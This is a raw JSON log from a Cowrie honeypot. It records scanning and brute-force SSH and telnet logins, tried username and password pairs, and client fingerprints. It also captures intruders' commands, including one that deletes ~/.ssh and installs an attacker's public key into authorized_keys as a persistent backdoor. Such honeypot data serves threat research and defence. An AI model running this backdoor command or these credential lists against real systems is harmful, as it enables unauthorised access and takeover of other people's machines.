{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T15:47:12.147782Z","src_ip":"213.209.150.239","session":"636b1cb1256d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:47:12.205420Z","src_ip":"213.209.150.239","session":"636b1cb1256d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38096,"dst_ip":"1.2.3.4","dst_port":23,"session":"482ce035f91b","protocol":"telnet","message":"New connection: 212.227.125.160:38096 (1.2.3.4:23) [session: 482ce035f91b]","sensor":"my-vps","timestamp":"2025-08-26T15:47:21.750848Z"}
{"eventid":"cowrie.session.closed","duration":31.165878295898438,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:47:34.391273Z","src_ip":"212.227.125.160","session":"86f2f15cca80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51510,"dst_ip":"1.2.3.4","dst_port":23,"session":"bc0485f292ac","protocol":"telnet","message":"New connection: 212.227.125.160:51510 (1.2.3.4:23) [session: bc0485f292ac]","sensor":"my-vps","timestamp":"2025-08-26T15:47:52.125077Z"}
{"eventid":"cowrie.session.closed","duration":30.640599966049194,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:47:52.391343Z","src_ip":"212.227.125.160","session":"482ce035f91b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41802,"dst_ip":"1.2.3.4","dst_port":22,"session":"f508c3a5b948","protocol":"ssh","message":"New connection: 212.227.235.229:41802 (1.2.3.4:22) [session: f508c3a5b948]","sensor":"my-vps","timestamp":"2025-08-26T15:48:07.027627Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41254,"dst_ip":"1.2.3.4","dst_port":23,"session":"38af7e6794ae","protocol":"telnet","message":"New connection: 212.227.125.160:41254 (1.2.3.4:23) [session: 38af7e6794ae]","sensor":"my-vps","timestamp":"2025-08-26T15:48:07.043288Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:48:07.587916Z","src_ip":"212.227.235.229","session":"f508c3a5b948"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T15:48:07.588661Z","src_ip":"212.227.235.229","session":"f508c3a5b948"}
{"eventid":"cowrie.login.success","username":"root","password":"Nara@123","message":"login attempt [root/Nara@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:48:10.584526Z","src_ip":"212.227.235.229","session":"f508c3a5b948"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:48:11.128964Z","src_ip":"212.227.235.229","session":"f508c3a5b948"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53574,"dst_ip":"1.2.3.4","dst_port":23,"session":"bf1c587a215e","protocol":"telnet","message":"New connection: 212.227.125.160:53574 (1.2.3.4:23) [session: bf1c587a215e]","sensor":"my-vps","timestamp":"2025-08-26T15:48:13.328441Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53584,"dst_ip":"1.2.3.4","dst_port":23,"session":"62599784314d","protocol":"telnet","message":"New connection: 212.227.125.160:53584 (1.2.3.4:23) [session: 62599784314d]","sensor":"my-vps","timestamp":"2025-08-26T15:48:13.343411Z"}
{"eventid":"cowrie.session.closed","duration":30.294782638549805,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:48:22.419792Z","src_ip":"212.227.125.160","session":"bc0485f292ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37604,"dst_ip":"1.2.3.4","dst_port":23,"session":"d2ebeef6b5a0","protocol":"telnet","message":"New connection: 212.227.125.160:37604 (1.2.3.4:23) [session: d2ebeef6b5a0]","sensor":"my-vps","timestamp":"2025-08-26T15:48:26.955980Z"}
{"eventid":"cowrie.session.closed","duration":30.37646746635437,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:48:37.419702Z","src_ip":"212.227.125.160","session":"38af7e6794ae"}
{"eventid":"cowrie.session.closed","duration":31.060884952545166,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:48:44.389232Z","src_ip":"212.227.125.160","session":"bf1c587a215e"}
{"eventid":"cowrie.session.closed","duration":31.228339910507202,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:48:44.571674Z","src_ip":"212.227.125.160","session":"62599784314d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:48:55.482104Z","src_ip":"79.124.8.120","session":"37817e58245c"}
{"eventid":"cowrie.session.closed","duration":180.10970664024353,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:48:55.487307Z","src_ip":"79.124.8.120","session":"37817e58245c"}
{"eventid":"cowrie.session.closed","duration":32.943655490875244,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:48:59.899563Z","src_ip":"212.227.125.160","session":"d2ebeef6b5a0"}
{"eventid":"cowrie.session.connect","src_ip":"192.3.105.24","src_port":59856,"dst_ip":"1.2.3.4","dst_port":22,"session":"50ada41aedff","protocol":"ssh","message":"New connection: 192.3.105.24:59856 (1.2.3.4:22) [session: 50ada41aedff]","sensor":"my-vps","timestamp":"2025-08-26T15:50:07.647668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:50:07.648742Z","src_ip":"192.3.105.24","session":"50ada41aedff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:50:07.786529Z","src_ip":"192.3.105.24","session":"50ada41aedff"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab1234567","message":"login attempt [root/Ab1234567] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:50:08.340387Z","src_ip":"192.3.105.24","session":"50ada41aedff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:50:08.660435Z","src_ip":"192.3.105.24","session":"50ada41aedff"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:50:08.661144Z","src_ip":"192.3.105.24","session":"50ada41aedff"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:50:08.662282Z","src_ip":"192.3.105.24","session":"50ada41aedff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:50:08.802119Z","src_ip":"192.3.105.24","session":"50ada41aedff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:50:09.138892Z","src_ip":"192.3.105.24","session":"50ada41aedff"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T15:50:09.139596Z","src_ip":"192.3.105.24","session":"50ada41aedff"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T15:50:09.280859Z","src_ip":"192.3.105.24","session":"50ada41aedff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:50:09.281888Z","src_ip":"192.3.105.24","session":"50ada41aedff"}
{"eventid":"cowrie.session.connect","src_ip":"192.3.105.24","src_port":59860,"dst_ip":"1.2.3.4","dst_port":22,"session":"e13588512126","protocol":"ssh","message":"New connection: 192.3.105.24:59860 (1.2.3.4:22) [session: e13588512126]","sensor":"my-vps","timestamp":"2025-08-26T15:50:09.417898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:50:09.419053Z","src_ip":"192.3.105.24","session":"e13588512126"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:50:09.557135Z","src_ip":"192.3.105.24","session":"e13588512126"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T15:50:10.149919Z","src_ip":"192.3.105.24","session":"e13588512126"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:50:11.290450Z","src_ip":"192.3.105.24","session":"e13588512126"}
{"eventid":"cowrie.session.connect","src_ip":"192.3.105.24","src_port":59864,"dst_ip":"1.2.3.4","dst_port":22,"session":"43be3d7d1859","protocol":"ssh","message":"New connection: 192.3.105.24:59864 (1.2.3.4:22) [session: 43be3d7d1859]","sensor":"my-vps","timestamp":"2025-08-26T15:50:11.429479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:50:11.430150Z","src_ip":"192.3.105.24","session":"43be3d7d1859"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:50:11.569250Z","src_ip":"192.3.105.24","session":"43be3d7d1859"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:50:12.166639Z","src_ip":"192.3.105.24","session":"43be3d7d1859"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:50:12.305730Z","src_ip":"192.3.105.24","session":"50ada41aedff"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:50:12.306999Z","src_ip":"192.3.105.24","session":"43be3d7d1859"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":28966,"dst_ip":"1.2.3.4","dst_port":22,"session":"92b99fc55196","protocol":"ssh","message":"New connection: 80.94.95.15:28966 (1.2.3.4:22) [session: 92b99fc55196]","sensor":"my-vps","timestamp":"2025-08-26T15:50:14.024995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T15:50:14.025849Z","src_ip":"80.94.95.15","session":"92b99fc55196"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T15:50:14.106641Z","src_ip":"80.94.95.15","session":"92b99fc55196"}
{"eventid":"cowrie.login.failed","username":"marquis","password":"marquis","message":"login attempt [marquis/marquis] failed","sensor":"my-vps","timestamp":"2025-08-26T15:50:14.454149Z","src_ip":"80.94.95.15","session":"92b99fc55196"}
{"eventid":"cowrie.login.failed","username":"marquis","password":"marquis1","message":"login attempt [marquis/marquis1] failed","sensor":"my-vps","timestamp":"2025-08-26T15:50:15.522801Z","src_ip":"80.94.95.15","session":"92b99fc55196"}
{"eventid":"cowrie.login.failed","username":"marquis","password":"marquis123","message":"login attempt [marquis/marquis123] failed","sensor":"my-vps","timestamp":"2025-08-26T15:50:16.594341Z","src_ip":"80.94.95.15","session":"92b99fc55196"}
{"eventid":"cowrie.login.failed","username":"marquis","password":"marquis1234","message":"login attempt [marquis/marquis1234] failed","sensor":"my-vps","timestamp":"2025-08-26T15:50:17.662774Z","src_ip":"80.94.95.15","session":"92b99fc55196"}
{"eventid":"cowrie.login.failed","username":"marquis","password":"marquis12345","message":"login attempt [marquis/marquis12345] failed","sensor":"my-vps","timestamp":"2025-08-26T15:50:18.730927Z","src_ip":"80.94.95.15","session":"92b99fc55196"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:50:20.094587Z","src_ip":"80.94.95.15","session":"92b99fc55196"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37412,"dst_ip":"1.2.3.4","dst_port":23,"session":"b4842cfe15bc","protocol":"telnet","message":"New connection: 212.227.125.160:37412 (1.2.3.4:23) [session: b4842cfe15bc]","sensor":"my-vps","timestamp":"2025-08-26T15:50:24.941566Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.153.191.173","src_port":49270,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b6ea9b652b2","protocol":"ssh","message":"New connection: 103.153.191.173:49270 (1.2.3.4:22) [session: 6b6ea9b652b2]","sensor":"my-vps","timestamp":"2025-08-26T15:50:32.543544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:50:32.544949Z","src_ip":"103.153.191.173","session":"6b6ea9b652b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:50:32.740069Z","src_ip":"103.153.191.173","session":"6b6ea9b652b2"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx2014","message":"login attempt [root/1qaz2wsx2014] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:50:33.561930Z","src_ip":"103.153.191.173","session":"6b6ea9b652b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:50:33.972440Z","src_ip":"103.153.191.173","session":"6b6ea9b652b2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:50:33.973253Z","src_ip":"103.153.191.173","session":"6b6ea9b652b2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:50:33.974546Z","src_ip":"103.153.191.173","session":"6b6ea9b652b2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:50:34.170710Z","src_ip":"103.153.191.173","session":"6b6ea9b652b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:50:34.671981Z","src_ip":"103.153.191.173","session":"6b6ea9b652b2"}
